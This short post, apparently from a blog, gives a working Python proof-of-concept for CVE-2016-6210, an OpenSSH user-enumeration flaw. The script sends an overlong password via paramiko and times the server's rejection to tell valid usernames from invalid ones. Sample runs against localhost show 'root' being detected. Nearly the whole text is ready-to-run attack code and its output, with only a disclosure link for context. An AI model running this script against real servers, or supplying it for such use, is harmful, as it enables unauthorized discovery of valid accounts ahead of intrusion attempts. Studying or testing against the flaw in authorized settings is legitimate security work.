# CVE-2016-6210: Opensshd user enumeration


# cat ssh_user_enumeration.py
import paramiko
import sys
import time

target = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = 'Z' * 25000
limit = int(sys.argv[4])

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:
 starttime = time.time()
 ssh.connect(target, port = port, username = username, password = password)
except:
 endtime = time.time()

total = endtime - starttime

if limit == 0:
 print total
elif limit <= total:
 print username, total

# python ssh_user_enumeration.py 127.0.0.1 22 user1 0
2.32467317581
# python ssh_user_enumeration.py 127.0.0.1 22 user2 0
2.62516498566
# python ssh_user_enumeration.py 127.0.0.1 22 root 3
root 7.46048903465
# python ssh_user_enumeration.py 127.0.0.1 22 user3 3

Reference

http://seclists.org/fulldisclosure/2016/Jul/51

No comments: